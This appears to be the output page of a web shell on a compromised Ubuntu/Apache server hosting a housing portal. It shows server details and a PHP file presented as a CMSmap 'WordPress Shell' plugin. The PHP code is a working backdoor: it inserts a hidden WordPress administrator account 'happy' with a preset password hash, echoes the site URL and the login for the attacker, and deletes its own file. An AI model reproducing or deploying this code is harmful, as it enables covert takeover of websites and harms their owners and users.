Server IP : 3.128.248.115 / Your IP : 3.133.124.23 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ip-172-31-33-233 5.15.0-1037-aws #41~20.04.1-Ubuntu SMP Mon May 22 18:18:00 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.28 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/housing-portal.org/ |
Upload File : |
<?php /** * Plugin Name: CMSmap - WordPress Shell * Plugin URI: https://github.com/m7x/cmsmap/ * Description: Simple WordPress Shell - Usage of CMSmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developer assumes no liability and is not responsible for any misuse or damage caused by this program. * Version: 1.0 * Author: CMSmap * Author URI: https://github.com/m7x/cmsmap/ * License: GPLv2 */ $patha = dirname(__FILE__) . '/'; $path = false; if(strpos($patha,'wp-content') !== false){ $path = explode('wp-content',$patha); $path = trim($path[0]); } if(strpos($patha,'wp-includes') !== false){ $path = explode('wp-includes',$patha); $path = trim($path[0]); } if(strpos($patha,'wp-admin') !== false){ $path = explode('wp-admin',$patha); $path = trim($path[0]); } if($path == false){ $path = $patha; } include($path.'wp-blog-header.php'); $userr = $table_prefix.'users'; $user_loginv = 'happy'; $aaa = $wpdb->get_row("SELECT * FROM `".$userr."` WHERE user_login = '".$user_loginv."'"); if(empty($aaa)){ $wpdb->insert($table_prefix.'users', array( 'ID' => null, 'user_login' => $user_loginv, 'user_pass' =>'094130c5306c4d6738e4c7ad991693e6', 'user_nicename' =>$user_loginv, 'user_email' =>'admin@admin.com', 'user_url' =>$user_loginv, 'user_registered' =>'2012-08-03 01:24:01', 'user_activation_key' =>'', 'user_status' =>'0', 'display_name' =>$user_loginv ) ); $userx = $wpdb->get_row("SELECT * FROM `".$userr."` WHERE user_login = '".$user_loginv."'"); $wp_user_object = new WP_User($userx->ID); $wp_user_object->set_role( 'administrator' ); $siteurl = $wpdb->get_row("SELECT * FROM `".$table_prefix.'options'."` WHERE option_name = 'siteurl'"); echo $siteurl->option_value.'|'.$user_loginv.'|'; }else{ echo 'false'; } unlink($_SERVER['SCRIPT_FILENAME']); ?>